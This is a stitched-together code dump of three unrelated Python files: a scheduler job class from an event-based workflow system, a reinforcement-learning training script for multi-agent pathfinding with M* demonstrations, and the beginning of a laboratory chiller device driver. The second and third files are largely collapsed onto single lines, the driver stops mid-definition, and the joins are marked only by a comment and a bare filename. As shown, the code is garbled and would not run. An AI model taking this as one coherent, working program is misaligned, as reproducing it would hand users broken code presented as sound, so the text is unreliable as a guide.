    def __init__(self, mailbox):
        self.mailbox = mailbox

    def process(self, events: List[BaseEvent]):
        for e in events:
            self.mailbox.send_message(e)


class EventBasedSchedulerJob(BaseJob):
    """
    1. todo self heartbeat
    2. todo check other scheduler failed
    3. todo timeout dagrun
    """
    __mapper_args__ = {'polymorphic_identity': 'EventBasedSchedulerJob'}

    def __init__(self, dag_directory, server_uri=None, max_runs=-1,
                 refresh_dag_dir_interval=conf.getint('scheduler', 'refresh_dag_dir_interval', fallback=1),
                 *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Central in-process message queue shared by all components below.
        self.mailbox: Mailbox = Mailbox()
        self.dag_trigger: DagTrigger = DagTrigger(
            dag_directory=dag_directory,
            max_runs=max_runs,
            dag_ids=None,
            pickle_dags=False,
            mailbox=self.mailbox,
            refresh_dag_dir_interval=refresh_dag_dir_interval,
            notification_service_uri=server_uri
        )
        self.task_event_manager = DagRunEventManager(self.mailbox)
        self.executor.set_mailbox(self.mailbox)
        self.notification_client: NotificationClient = NotificationClient(
            server_uri=server_uri, default_namespace=SCHEDULER_NAMESPACE)
        self.periodic_manager = PeriodicManager(self.mailbox)
        self.scheduler: EventBasedScheduler = EventBasedScheduler(
            self.id,
            self.mailbox,
            self.task_event_manager,
            self.executor,
            self.notification_client,
            None,
            self.periodic_manager
        )
        # Remembered so recover() can replay the previous job's queued messages.
        self.last_scheduling_id = self._last_scheduler_job_id()

    @staticmethod
    def _last_scheduler_job_id():
        """Return the id of the most recent scheduler job, or None if there is none."""
        last_run = EventBasedSchedulerJob.most_recent_job()
        if not last_run:
            return None
        else:
            return last_run.id

    def _execute(self):
        """Main entry point: start all components, recover state from the last
        job, run the scheduling loop, then shut everything down in order."""
        # faulthandler.enable()
        self.log.info("Starting the scheduler Job")

        # DAGs can be pickled for easier remote execution by some executors
        # pickle_dags = self.do_pickle and self.executor_class not in UNPICKLEABLE_EXECUTORS

        try:
            self.mailbox.set_scheduling_job_id(self.id)
            self.scheduler.id = self.id
            self._start_listen_events()
            self.dag_trigger.start()
            self.task_event_manager.start()
            self.executor.job_id = self.id
            self.executor.start()
            self.periodic_manager.start()

            self.register_signals()

            # Start after resetting orphaned tasks to avoid stressing out DB.

            execute_start_time = timezone.utcnow()

            self.scheduler.submit_sync_thread()
            self.scheduler.recover(self.last_scheduling_id)
            self._run_scheduler_loop()

            # Orderly shutdown of every component started above.
            self._stop_listen_events()
            self.periodic_manager.shutdown()
            self.dag_trigger.end()
            self.task_event_manager.end()
            self.executor.end()

            settings.Session.remove()  # type: ignore
        except Exception as e:  # pylint: disable=broad-except
            self.log.exception("Exception when executing scheduler, %s", e)
        finally:
            self.log.info("Exited execute loop")

    def _run_scheduler_loop(self) -> None:
        """Drive scheduler.schedule() until it returns False, heartbeating
        between iterations; stop the scheduler's timer on exit."""
        self.log.info("Starting the scheduler loop.")
        self.scheduler.restore_unfinished_dag_run()
        should_continue = True
        while should_continue:
            should_continue = self.scheduler.schedule()
            self.heartbeat(only_if_necessary=True)
        self.scheduler.stop_timer()

    def _start_listen_events(self):
        """Subscribe to notification events from now on; they are funneled
        into the mailbox via SchedulerEventWatcher."""
        watcher = SchedulerEventWatcher(self.mailbox)
        self.notification_client.start_listen_events(
            watcher=watcher,
            start_time=int(time.time() * 1000),
            version=None
        )

    def _stop_listen_events(self):
        self.notification_client.stop_listen_events()

    def register_signals(self) -> None:
        """Register signals that stop child processes"""
        signal.signal(signal.SIGINT, self._exit_gracefully)
        signal.signal(signal.SIGTERM, self._exit_gracefully)
        signal.signal(signal.SIGUSR2, self._debug_dump)

    def _exit_gracefully(self, signum, frame) -> None:  # pylint: disable=unused-argument
        """Helper method to clean up processor_agent to avoid leaving orphan processes."""
        self.log.info("Exiting gracefully upon receiving signal %s", signum)
        sys.exit(os.EX_OK)

    def _debug_dump(self, signum, frame):  # pylint: disable=unused-argument
        """SIGUSR2 handler: log a banner and ask the executor to dump its state."""
        try:
            sig_name = signal.Signals(signum).name  # pylint: disable=no-member
        except Exception:  # pylint: disable=broad-except
            sig_name = str(signum)

        self.log.info("%s\n%s received, printing debug\n%s", "-" * 80, sig_name, "-" * 80)

        self.executor.debug_dump()
        self.log.info("-" * 80)

    def is_alive(self, grace_multiplier: Optional[float] = None) -> bool:
        """
        Is this SchedulerJob alive?

        We define alive as in a state of running and a heartbeat within the
        threshold defined in the ``scheduler_health_check_threshold`` config
        setting.

        ``grace_multiplier`` is accepted for compatibility with the parent class.

        :rtype: boolean
        """
        if grace_multiplier is not None:
            # Accept the same behaviour as superclass
            return super().is_alive(grace_multiplier=grace_multiplier)
        scheduler_health_check_threshold: int = conf.getint('scheduler', 'scheduler_health_check_threshold')
        return (
            self.state == State.RUNNING
            and (timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
        )
# ===== train.py (second concatenated file begins below) =====
#this should be the thing, right? from __future__ import division import gym import numpy as np import random import tensorflow as tf import tensorflow.contrib.layers as layers import matplotlib.pyplot as plt import cpp_mstar from od_mstar3.col_set_addition import OutOfTimeError,NoSolutionError import threading import time import scipy.signal as signal import os import GroupLock import multiprocessing import mapf_gym as mapf_gym import pickle import imageio from ACNet import ACNet from tensorflow.python.client import device_lib dev_list = device_lib.list_local_devices() print(dev_list) #assert len(dev_list) > 1 def make_gif(images, fname, duration=2, true_image=False,salience=False,salIMGS=None): imageio.mimwrite(fname,images,subrectangles=True) print("wrote gif") # Copies one set of variables to another. # Used to set worker network parameters to those of global network. def update_target_graph(from_scope,to_scope): from_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, from_scope) to_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, to_scope) op_holder = [] for from_var,to_var in zip(from_vars,to_vars): op_holder.append(to_var.assign(from_var)) return op_holder def discount(x, gamma): return signal.lfilter([1], [1, -gamma], x[::-1], axis=0)[::-1] def good_discount(x, gamma): return discount(x,gamma) class Worker: def __init__(self, game, metaAgentID, workerID, a_size, groupLock): self.workerID = workerID self.env = game self.metaAgentID = metaAgentID self.name = "worker_"+str(workerID) self.agentID = ((workerID-1) % num_workers) + 1 self.groupLock = groupLock self.nextGIF = episode_count # For GIFs output #Create the local copy of the network and the tensorflow op to copy global parameters to local network self.local_AC = ACNet(self.name,a_size,trainer,True,GRID_SIZE,GLOBAL_NET_SCOPE) self.pull_global = update_target_graph(GLOBAL_NET_SCOPE, self.name) def synchronize(self): #handy thing for keeping track of which to release and acquire if(not 
hasattr(self,"lock_bool")): self.lock_bool=False self.groupLock.release(int(self.lock_bool),self.name) self.groupLock.acquire(int(not self.lock_bool),self.name) self.lock_bool=not self.lock_bool def train(self, rollout, sess, gamma, bootstrap_value,imitation=False): global episode_count if imitation: rollout=np.array(rollout) #we calculate the loss differently for imitation #if imitation=True the rollout is assumed to have different dimensions: #[o[0],o[1],optimal_actions] rnn_state = self.local_AC.state_init print('rollout', rollout.shape) feed_dict={global_step:episode_count, self.local_AC.inputs:np.stack(rollout[:,0]), self.local_AC.goal_pos:np.stack(rollout[:,1]), self.local_AC.optimal_actions:np.stack(rollout[:,2]), self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1] } _,i_l,_=sess.run([self.local_AC.policy,self.local_AC.imitation_loss, self.local_AC.apply_imitation_grads], feed_dict=feed_dict) return i_l rollout = np.array(rollout) observations = rollout[:,0] goals=rollout[:,-2] actions = rollout[:,1] rewards = rollout[:,2] values = rollout[:,5] valids = rollout[:,6] blockings = rollout[:,10] on_goals=rollout[:,8] train_value = rollout[:,-1] # Here we take the rewards and values from the rollout, and use them to # generate the advantage and discounted returns. 
(With bootstrapping) # The advantage function uses "Generalized Advantage Estimation" self.rewards_plus = np.asarray(rewards.tolist() + [bootstrap_value]) discounted_rewards = discount(self.rewards_plus,gamma)[:-1] self.value_plus = np.asarray(values.tolist() + [bootstrap_value]) advantages = rewards + gamma * self.value_plus[1:] - self.value_plus[:-1] advantages = good_discount(advantages,gamma) num_samples = min(EPISODE_SAMPLES,len(advantages)) sampleInd = np.sort(np.random.choice(advantages.shape[0], size=(num_samples,), replace=False)) # Update the global network using gradients from loss # Generate network statistics to periodically save rnn_state = self.local_AC.state_init feed_dict = { global_step:episode_count, self.local_AC.target_v:np.stack(discounted_rewards), self.local_AC.inputs:np.stack(observations), self.local_AC.goal_pos:np.stack(goals), self.local_AC.actions:actions, self.local_AC.train_valid:np.stack(valids), self.local_AC.advantages:advantages, self.local_AC.train_value:train_value, self.local_AC.target_blockings:blockings, self.local_AC.target_on_goals:on_goals, self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1] } v_l,p_l,valid_l,e_l,g_n,v_n,b_l,og_l,_ = sess.run([self.local_AC.value_loss, self.local_AC.policy_loss, self.local_AC.valid_loss, self.local_AC.entropy, self.local_AC.grad_norms, self.local_AC.var_norms, self.local_AC.blocking_loss, self.local_AC.on_goal_loss, self.local_AC.apply_grads], feed_dict=feed_dict) return v_l/len(rollout), p_l/len(rollout), valid_l/len(rollout), e_l/len(rollout), b_l/len(rollout), og_l/len(rollout), g_n, v_n def shouldRun(self, coord, episode_count): if TRAINING: return (not coord.should_stop()) else: return (episode_count < NUM_EXPS) def parse_path(self,path): '''needed function to take the path generated from M* and create the observations and actions for the agent path: the exact path ouput by M*, assuming the correct number of agents returns: the list of rollouts for the 
"episode": list of length num_agents with each sublist a list of tuples (observation[0],observation[1],optimal_action,reward)''' result=[[] for i in range(num_workers)] for t in range(len(path[:-1])): observations=[] move_queue=list(range(num_workers)) for agent in range(1,num_workers+1): observations.append(self.env._observe(agent)) steps=0 while len(move_queue)>0: steps+=1 i=move_queue.pop(0) o=observations[i] pos=path[t][i] newPos=path[t+1][i]#guaranteed to be in bounds by loop guard direction=(newPos[0]-pos[0],newPos[1]-pos[1]) a=self.env.world.getAction(direction) state, reward, done, nextActions, on_goal, blocking, valid_action=self.env._step((i+1,a)) if steps>num_workers**2: #if we have a very confusing situation where lots of agents move #in a circle (difficult to parse and also (mostly) impossible to learn) return None if not valid_action: #the tie must be broken here move_queue.append(i) continue result[i].append([o[0],o[1],a]) return result def work(self,max_episode_length,gamma,sess,coord,saver): global episode_count, swarm_reward, episode_rewards, episode_lengths, episode_mean_values, episode_invalid_ops,episode_wrong_blocking #, episode_invalid_goals total_steps, i_buf = 0, 0 episode_buffers, s1Values = [ [] for _ in range(NUM_BUFFERS) ], [ [] for _ in range(NUM_BUFFERS) ] with sess.as_default(), sess.graph.as_default(): while self.shouldRun(coord, episode_count): sess.run(self.pull_global) episode_buffer, episode_values = [], [] episode_reward = episode_step_count = episode_inv_count = 0 d = False # Initial state from the environment if self.agentID==1: self.env._reset(self.agentID) self.synchronize() # synchronize starting time of the threads validActions = self.env._listNextValidActions(self.agentID) s = self.env._observe(self.agentID) blocking = False p=self.env.world.getPos(self.agentID) on_goal = self.env.world.goals[p[0],p[1]]==self.agentID s = self.env._observe(self.agentID) rnn_state = self.local_AC.state_init RewardNb = 0 wrong_blocking = 0 
wrong_on_goal=0 if self.agentID==1: global demon_probs demon_probs[self.metaAgentID]=np.random.rand() self.synchronize() # synchronize starting time of the threads # reset swarm_reward (for tensorboard) swarm_reward[self.metaAgentID] = 0 if episode_count<PRIMING_LENGTH or demon_probs[self.metaAgentID]<DEMONSTRATION_PROB: #for the first PRIMING_LENGTH episodes, or with a certain probability #don't train on the episode and instead observe a demonstration from M* if self.workerID==1 and episode_count%100==0: saver.save(sess, model_path+'/model-'+str(int(episode_count))+'.cptk') global rollouts rollouts[self.metaAgentID]=None if(self.agentID==1): world=self.env.getObstacleMap() start_positions=tuple(self.env.getPositions()) goals=tuple(self.env.getGoals()) try: """TODO: CBS instead of mstar""" mstar_path=cpp_mstar.find_path(world,start_positions,goals,2,5) rollouts[self.metaAgentID]=self.parse_path(mstar_path) except OutOfTimeError: #M* timed out print("timeout",episode_count) except NoSolutionError: print("nosol????",episode_count,start_positions) self.synchronize() if rollouts[self.metaAgentID] is not None and len(rollouts) == 2: i_l=self.train(rollouts[self.metaAgentID][self.agentID-1], sess, gamma, None,imitation=True) episode_count+=1./num_workers if self.agentID==1: summary = tf.Summary() summary.value.add(tag='Losses/Imitation loss', simple_value=i_l) global_summary.add_summary(summary, int(episode_count)) global_summary.flush() continue continue saveGIF = False if OUTPUT_GIFS and self.workerID == 1 and ((not TRAINING) or (episode_count >= self.nextGIF)): saveGIF = True self.nextGIF =episode_count + 64 GIF_episode = int(episode_count) episode_frames = [ self.env._render(mode='rgb_array',screen_height=900,screen_width=900) ] while (not self.env.finished): # Give me something! #Take an action using probabilities from policy network output. 
a_dist,v,rnn_state,pred_blocking,pred_on_goal = sess.run([self.local_AC.policy, self.local_AC.value, self.local_AC.state_out, self.local_AC.blocking, self.local_AC.on_goal], feed_dict={self.local_AC.inputs:[s[0]], self.local_AC.goal_pos:[s[1]], self.local_AC.state_in[0]:rnn_state[0], self.local_AC.state_in[1]:rnn_state[1]}) if(not (np.argmax(a_dist.flatten()) in validActions)): episode_inv_count += 1 train_valid = np.zeros(a_size) train_valid[validActions] = 1 valid_dist = np.array([a_dist[0,validActions]]) valid_dist /= np.sum(valid_dist) if TRAINING: if (pred_blocking.flatten()[0] < 0.5) == blocking: wrong_blocking += 1 if (pred_on_goal.flatten()[0] < 0.5) == on_goal: wrong_on_goal += 1 a = validActions[ np.random.choice(range(valid_dist.shape[1]),p=valid_dist.ravel()) ] train_val = 1. else: a = np.argmax(a_dist.flatten()) if a not in validActions or not GREEDY: a = validActions[ np.random.choice(range(valid_dist.shape[1]),p=valid_dist.ravel()) ] train_val = 1. _, r, _, _, on_goal,blocking,_ = self.env._step((self.agentID, a),episode=episode_count) self.synchronize() # synchronize threads # Get common observation for all agents after all individual actions have been performed s1 = self.env._observe(self.agentID) validActions = self.env._listNextValidActions(self.agentID, a,episode=episode_count) d = self.env.finished if saveGIF: episode_frames.append(self.env._render(mode='rgb_array',screen_width=900,screen_height=900)) episode_buffer.append([s[0],a,r,s1,d,v[0,0],train_valid,pred_on_goal,int(on_goal),pred_blocking,int(blocking),s[1],train_val]) episode_values.append(v[0,0]) episode_reward += r s = s1 total_steps += 1 episode_step_count += 1 if r>0: RewardNb += 1 if d == True: print('\n{} Goodbye World. We did it!'.format(episode_step_count), end='\n') # If the episode hasn't ended, but the experience buffer is full, then we # make an update step using that experience rollout. 
if TRAINING and (len(episode_buffer) % EXPERIENCE_BUFFER_SIZE == 0 or d): # Since we don't know what the true final return is, we "bootstrap" from our current value estimation. if len(episode_buffer) >= EXPERIENCE_BUFFER_SIZE: episode_buffers[i_buf] = episode_buffer[-EXPERIENCE_BUFFER_SIZE:] else: episode_buffers[i_buf] = episode_buffer[:] if d: s1Values[i_buf] = 0 else: s1Values[i_buf] = sess.run(self.local_AC.value, feed_dict={self.local_AC.inputs:np.array([s[0]]) ,self.local_AC.goal_pos:[s[1]] ,self.local_AC.state_in[0]:rnn_state[0] ,self.local_AC.state_in[1]:rnn_state[1]})[0,0] if (episode_count-EPISODE_START) < NUM_BUFFERS: i_rand = np.random.randint(i_buf+1) else: i_rand = np.random.randint(NUM_BUFFERS) tmp = np.array(episode_buffers[i_rand]) while tmp.shape[0] == 0: i_rand = np.random.randint(NUM_BUFFERS) tmp = np.array(episode_buffers[i_rand]) v_l,p_l,valid_l,e_l,b_l,og_l,g_n,v_n = self.train(episode_buffers[i_rand],sess,gamma,s1Values[i_rand]) i_buf = (i_buf + 1) % NUM_BUFFERS episode_buffers[i_buf] = [] self.synchronize() # synchronize threads sess.run(self.pull_global) if episode_step_count >= max_episode_length or d: break episode_lengths[self.metaAgentID].append(episode_step_count) episode_mean_values[self.metaAgentID].append(np.nanmean(episode_values)) episode_invalid_ops[self.metaAgentID].append(episode_inv_count) episode_wrong_blocking[self.metaAgentID].append(wrong_blocking) # Periodically save gifs of episodes, model parameters, and summary statistics. 
if episode_count % EXPERIENCE_BUFFER_SIZE == 0 and printQ: print(' ', end='\r') print('{} Episode terminated ({},{})'.format(episode_count, self.agentID, RewardNb), end='\r') swarm_reward[self.metaAgentID] += episode_reward self.synchronize() # synchronize threads episode_rewards[self.metaAgentID].append(swarm_reward[self.metaAgentID]) if not TRAINING: mutex.acquire() if episode_count < NUM_EXPS: plan_durations[episode_count] = episode_step_count if self.workerID == 1: episode_count += 1 print('({}) Thread {}: {} steps, {:.2f} reward ({} invalids).'.format(episode_count, self.workerID, episode_step_count, episode_reward, episode_inv_count)) GIF_episode = int(episode_count) mutex.release() else: episode_count+=1./num_workers if episode_count % SUMMARY_WINDOW == 0: if episode_count % 100 == 0: print ('Saving Model', end='\n') saver.save(sess, model_path+'/model-'+str(int(episode_count))+'.cptk') print ('Saved Model', end='\n') SL = SUMMARY_WINDOW * num_workers mean_reward = np.nanmean(episode_rewards[self.metaAgentID][-SL:]) mean_length = np.nanmean(episode_lengths[self.metaAgentID][-SL:]) mean_value = np.nanmean(episode_mean_values[self.metaAgentID][-SL:]) mean_invalid = np.nanmean(episode_invalid_ops[self.metaAgentID][-SL:]) mean_wrong_blocking = np.nanmean(episode_wrong_blocking[self.metaAgentID][-SL:]) current_learning_rate = sess.run(lr,feed_dict={global_step:episode_count}) summary = tf.Summary() summary.value.add(tag='Perf/Learning Rate',simple_value=current_learning_rate) summary.value.add(tag='Perf/Reward', simple_value=mean_reward) summary.value.add(tag='Perf/Length', simple_value=mean_length) summary.value.add(tag='Perf/Valid Rate', simple_value=(mean_length-mean_invalid)/mean_length) summary.value.add(tag='Perf/Blocking Prediction Accuracy', simple_value=(mean_length-mean_wrong_blocking)/mean_length) summary.value.add(tag='Losses/Value Loss', simple_value=v_l) summary.value.add(tag='Losses/Policy Loss', simple_value=p_l) 
summary.value.add(tag='Losses/Blocking Loss', simple_value=b_l) summary.value.add(tag='Losses/On Goal Loss', simple_value=og_l) summary.value.add(tag='Losses/Valid Loss', simple_value=valid_l) summary.value.add(tag='Losses/Grad Norm', simple_value=g_n) summary.value.add(tag='Losses/Var Norm', simple_value=v_n) global_summary.add_summary(summary, int(episode_count)) global_summary.flush() if printQ: print('{} Tensorboard updated ({})'.format(episode_count, self.workerID), end='\r') if saveGIF: # Dump episode frames for external gif generation (otherwise, makes the jupyter kernel crash) time_per_step = 0.1 images = np.array(episode_frames) if TRAINING: make_gif(images, '{}/episode_{:d}_{:d}_{:.1f}.gif'.format(gifs_path,GIF_episode,episode_step_count,swarm_reward[self.metaAgentID])) else: make_gif(images, '{}/episode_{:d}_{:d}.gif'.format(gifs_path,GIF_episode,episode_step_count), duration=len(images)*time_per_step,true_image=True,salience=False) if SAVE_EPISODE_BUFFER: with open('gifs3D/episode_{}.dat'.format(GIF_episode), 'wb') as file: pickle.dump(episode_buffer, file) # Learning parameters max_episode_length = 256 episode_count = 0 EPISODE_START = episode_count gamma = .95 # discount rate for advantage estimation and reward discounting #moved network parameters to ACNet.py EXPERIENCE_BUFFER_SIZE = 128 GRID_SIZE = 5 #the size of the FOV grid to apply to each agent ENVIRONMENT_SIZE = (5,5)#the total size of the environment (length of one side) OBSTACLE_DENSITY = (0,0.000001) #range of densities DIAG_MVMT = False # Diagonal movements allowed? 
# --- Training hyperparameters -------------------------------------------
# NOTE(review): this file had lost its indentation; block structure below was
# reconstructed from syntax — confirm against the original PRIMAL driver.
a_size = 5 + int(DIAG_MVMT)*4  # action space: 4 moves + wait, +4 diagonals if enabled
SUMMARY_WINDOW = 10            # episodes between tensorboard summary dumps
NUM_META_AGENTS = 3
NUM_THREADS = 1 #int(multiprocessing.cpu_count() / (2 * NUM_META_AGENTS))
NUM_BUFFERS = 1 # NO EXPERIENCE REPLAY int(NUM_THREADS / 2)
EPISODE_SAMPLES = EXPERIENCE_BUFFER_SIZE # 64
LR_Q = 2.e-5 #8.e-5 / NUM_THREADS # default: 1e-5
ADAPT_LR = True
ADAPT_COEFF = 5.e-5 #the coefficient A in LR_Q/sqrt(A*steps+1) for calculating LR
load_model = False
RESET_TRAINER = False
model_path = 'model_primal'
gifs_path = 'gifs_primal'
train_path = 'train_primal'
GLOBAL_NET_SCOPE = 'global'

# Imitation options
PRIMING_LENGTH = 0       # number of episodes at the beginning to train only on demonstrations
DEMONSTRATION_PROB = 0.5 # probability of training on a demonstration per episode

# Simulation options
FULL_HELP = False
OUTPUT_GIFS = True
SAVE_EPISODE_BUFFER = False

# Testing
TRAINING = True
GREEDY = False
NUM_EXPS = 100
MODEL_NUMBER = 313000

# Shared arrays for tensorboard (one slot per meta-agent)
episode_rewards = [ [] for _ in range(NUM_META_AGENTS) ]
episode_lengths = [ [] for _ in range(NUM_META_AGENTS) ]
episode_mean_values = [ [] for _ in range(NUM_META_AGENTS) ]
episode_invalid_ops = [ [] for _ in range(NUM_META_AGENTS) ]
episode_wrong_blocking = [ [] for _ in range(NUM_META_AGENTS) ]
rollouts = [ None for _ in range(NUM_META_AGENTS)]
demon_probs=[np.random.rand() for _ in range(NUM_META_AGENTS)]
# episode_steps_on_goal = [ [] for _ in range(NUM_META_AGENTS) ]
printQ = False # (for headless)
swarm_reward = [0]*NUM_META_AGENTS

tf.reset_default_graph()
print("Hello World")
if not os.path.exists(model_path):
    os.makedirs(model_path)
config = tf.ConfigProto(allow_soft_placement = True)
config.gpu_options.allow_growth=True

if not TRAINING:
    plan_durations = np.array([0 for _ in range(NUM_EXPS)])
    mutex = threading.Lock()
    gifs_path += '_tests'
    if SAVE_EPISODE_BUFFER and not os.path.exists('gifs3D'):
        os.makedirs('gifs3D')

# Create a directory to save episode playback gifs to
if not os.path.exists(gifs_path):
    os.makedirs(gifs_path)

with tf.device("/gpu:0"):
    # Global (master) network shared by all workers.
    master_network = ACNet(GLOBAL_NET_SCOPE,a_size,None,False,GRID_SIZE,GLOBAL_NET_SCOPE) # Generate global network

    global_step = tf.placeholder(tf.float32)
    if ADAPT_LR:
        # computes LR_Q/sqrt(ADAPT_COEFF*steps+1)
        # we need the +1 so that lr at step 0 is defined
        lr = tf.divide(tf.constant(LR_Q), tf.sqrt(tf.add(1., tf.multiply(tf.constant(ADAPT_COEFF), global_step))))
    else:
        lr = tf.constant(LR_Q)
    trainer = tf.contrib.opt.NadamOptimizer(learning_rate=lr, use_locking=True)

    if TRAINING:
        num_workers = NUM_THREADS # Set workers # = # of available CPU threads
    else:
        num_workers = NUM_THREADS
        NUM_META_AGENTS = 1

    gameEnvs, workers, groupLocks = [], [], []
    n = 1  # counter of total number of agents (for naming)
    for ma in range(NUM_META_AGENTS):
        num_agents = NUM_THREADS
        gameEnv = mapf_gym.MAPFEnv(num_agents=num_agents, DIAGONAL_MOVEMENT=DIAG_MVMT,
                                   SIZE=ENVIRONMENT_SIZE, observation_size=GRID_SIZE,
                                   PROB=OBSTACLE_DENSITY, FULL_HELP=FULL_HELP)
        gameEnvs.append(gameEnv)

        # Create groupLock so all workers of a meta-agent step in lock-step.
        workerNames = ["worker_"+str(i) for i in range(n, n+num_workers)]
        groupLock = GroupLock.GroupLock([workerNames, workerNames])
        groupLocks.append(groupLock)

        # Create worker classes
        workersTmp = []
        for i in range(ma*num_workers+1, (ma+1)*num_workers+1):
            workersTmp.append(Worker(gameEnv, ma, n, a_size, groupLock))
            n += 1
        workers.append(workersTmp)

global_summary = tf.summary.FileWriter(train_path)
saver = tf.train.Saver(max_to_keep=2)

with tf.Session(config=config) as sess:
    sess.run(tf.global_variables_initializer())
    coord = tf.train.Coordinator()
    if load_model == True:
        print('Loading Model...')
        if not TRAINING:
            # Force the checkpoint file to point at the requested model number.
            with open(model_path+'/checkpoint', 'w') as file:
                file.write('model_checkpoint_path: "model-{}.cptk"'.format(MODEL_NUMBER))
        # Recover the episode counter from the checkpoint file name
        # ("model-<episode>.cptk").
        ckpt = tf.train.get_checkpoint_state(model_path)
        p = ckpt.model_checkpoint_path
        p = p[p.find('-')+1:]
        p = p[:p.find('.')]
        episode_count = int(p)
        saver.restore(sess, ckpt.model_checkpoint_path)
        print("episode_count set to ", episode_count)
        if RESET_TRAINER:
            trainer = tf.contrib.opt.NadamOptimizer(learning_rate=lr, use_locking=True)

    # This is where the asynchronous magic happens.
    # Start the "work" process for each worker in a separate thread.
    worker_threads = []
    for ma in range(NUM_META_AGENTS):
        for worker in workers[ma]:
            groupLocks[ma].acquire(0, worker.name) # synchronize starting time of the threads
            # FIX: bind `worker` as a default argument. The original
            # `lambda: worker.work(...)` captured the loop variable by
            # reference (late binding), so a thread scheduled after the loop
            # advanced could run the wrong worker's work().
            worker_work = lambda worker=worker: worker.work(max_episode_length, gamma, sess, coord, saver)
            print("Starting worker " + str(worker.workerID))
            t = threading.Thread(target=(worker_work))
            t.start()
            worker_threads.append(t)
    coord.join(worker_threads)

if not TRAINING:
    # Report mean / std plan duration and success rate over all test episodes.
    print([np.mean(plan_durations), np.sqrt(np.var(plan_durations)),
           np.mean(np.asarray(plan_durations < max_episode_length, dtype=float))])
julabo_cf41.py
"""PyLabware driver for Julabo CF41 chiller.""" import threading from time import sleep from typing import Optional, Union import serial # Core imports from .. import parsers as parser from ..controllers import AbstractTemperatureController, in_simulation_device_returns from ..exceptions import (PLConnectionError, PLDeviceCommandError, PLDeviceInternalError, PLDeviceReplyError) from ..models import LabDeviceCommands, ConnectionParameters class CF41ChillerCommands(LabDeviceCommands): """Collection of command definitions for CF41 chiller. """ # ################### Configuration constants ############################# DEFAULT_NAME = "JULABO CRYOCOMPACT CF41" # Selected setpoint to use SETPOINT_MODES = {0: "SP1", 1: "SP2", 2: "SP3"} # Self-tuning modes SELFTUNE_MODES = {0: "SELFTUNE_OFF", 1: "SELFTUNE_ONCE", 2: "SELFTUNE_ALWAYS"} # External programmer input modes. 0 - voltage 0..10V; 1 - current 0..20mA EXTPROG_MODES = {0: "EXT_VOLTAGE", 1: "EXT_CURRENT"} # Temperature regulation mode. 0 - internal; 1 - external Pt100 REGULATION_MODES = {0: "INTERNAL", 1: "EXTERNAL"} # Control dynamics modes CONTROL_DYNAMCIS_MODES = {0: "APERIODIC", 1: "STANDARD"} # Pump speed modes PUMP_SPEED_MODES = [1, 2, 3, 4] STATUSES = { "00": "STOPPED", "02": "STOPPED", "01": "STARTED", "03": "STARTED" } # Non critical errors. User has to be notified, but device can keep operating. WARNINGS = { "-10": "Entered value too small!", "-11": "Entered value too large!", "-15": "External control selected, but Pt100 sensor not connected.", "-20": "Check air cooled condenser.", "-21": "Compressor stage 1 does not work.", "-26": "Stand-by plug is missing.", "-33": "Safety temperature sensor short-circuited or open!", "-38": "External Pt100 sensor error!", "-40": "Coolant level low" } # Critical errors. Device operation is not possible until the error is cleared. 
ERRORS = { "-01": "Coolant level critically low!", "-03": "Coolant temperature too high!", "-04": "Coolant temperature too low!", "-05": "Working temperature sensor short-circuited or open!", "-06": "Temperature difference between working and safety temperature is above 35°C!", "-07": "Internal I2C bus error!", "-08": "Invalid command!", "-09": "Invalid command in current operating mode!", "-12": "Internal ADC error!", "-13": "Set temperature value exceeds safety limits!", "-14": "Excess temperature protection alarm", } # ################### Control commands ################################### # Get software version GET_VERSION = {"name": "VERSION", "reply": {"type": str, "parser": parser.slicer, "args": [-3]}} # Get device name GET_NAME = {"name": "VERSION", "reply": {"type": str, "parser": parser.slicer, "args": [0, 23]}} # Get status/error message GET_STATUS = {"name": "STATUS", "reply": {"type": str, "parser": parser.slicer, "args": [0, 2]}} # Get/set working temperature - setpoint 1 GET_TEMP_SP1 = {"name": "IN_SP_00", "reply": {"type": float}} # Most of the chillers have H5 cooling fluid which has recommended temperature -40..110 ºC SET_TEMP_SP1 = {"name": "OUT_SP_00", "type": float, "check": {"min": -40, "max": 110}} # Get/set working temperature - setpoint 2 GET_TEMP_SP2 = {"name": "IN_SP_01", "reply": {"type": float}} SET_TEMP_SP2 = {"name": "OUT_SP_01", "type": float, "check": {"min": -40, "max": 110}} # Get/set working temperature - setpoint 3 GET_TEMP_SP3 = {"name": "IN_SP_02", "reply": {"type": float}} SET_TEMP_SP3 = {"name": "OUT_SP_02", "type": float, "check": {"min": -40, "max": 110}} # Get/set pump speed mode GET_PUMP_SPEED = {"name": "IN_SP_07", "reply": {"type": int}} SET_PUMP_SPEED = {"name": "OUT_SP_07", "type": int, "check": {"values": PUMP_SPEED_MODES}} # Get/set maximum cooling power GET_MAX_COOL_PWR = {"name": "IN_HIL_00", "reply": {"type": int}} SET_MAX_COOL_PWR = {"name": "OUT_HIL_00", "type": int, "check": {"min": -100, "max": 0}} # 
Get/set maximum heating power GET_MAX_HEAT_PWR = {"name": "IN_HIL_01", "reply": {"type": int}} SET_MAX_HEAT_PWR = {"name": "OUT_HIL_01", "type": int, "check": {"min": 10, "max": 100}} # Start the chiller START_CHILLER = {"name": "OUT_MODE_05 1"} # Stop the chiller STOP_CHILLER = {"name": "OUT_MODE_05 0"} # Get chiller state GET_CHILLER_STATE = {"name": "IN_MODE_05", "reply": {"type": int}} # Get actual bath temperature GET_TEMP_INT = {"name": "IN_PV_00", "reply": {"type": float}} # Get heating power, % GET_HEAT_PWR = {"name": "IN_PV_01", "reply": {"type": float}} # Get temperature from external Pt100 sensor GET_TEMP_EXT = {"name": "IN_PV_02", "reply": {"type": float}} # Get safety sensor temperature GET_TEMP_SAFE = {"name": "IN_PV_03", "reply": {"type": float}} # Get safety temperature setpoint GET_TEMP_SAFE_SET = {"name": "IN_PV_04", "reply": {"type": float}} # Get/set high temperature warning limit GET_TEMP_LIM_HI = {"name": "IN_SP_03", "reply": {"type": float}} # Room temperature to maximum temp the chiller can reach SET_TEMP_LIM_HI = {"name": "OUT_SP_03", "type": float, "check": {"min": 20, "max": 190}} # Get/set low temperature warning limit GET_TEMP_LIM_LO = {"name": "IN_SP_04", "reply": {"type": float}} # Room temperature to minimum temperature the chiller can reach 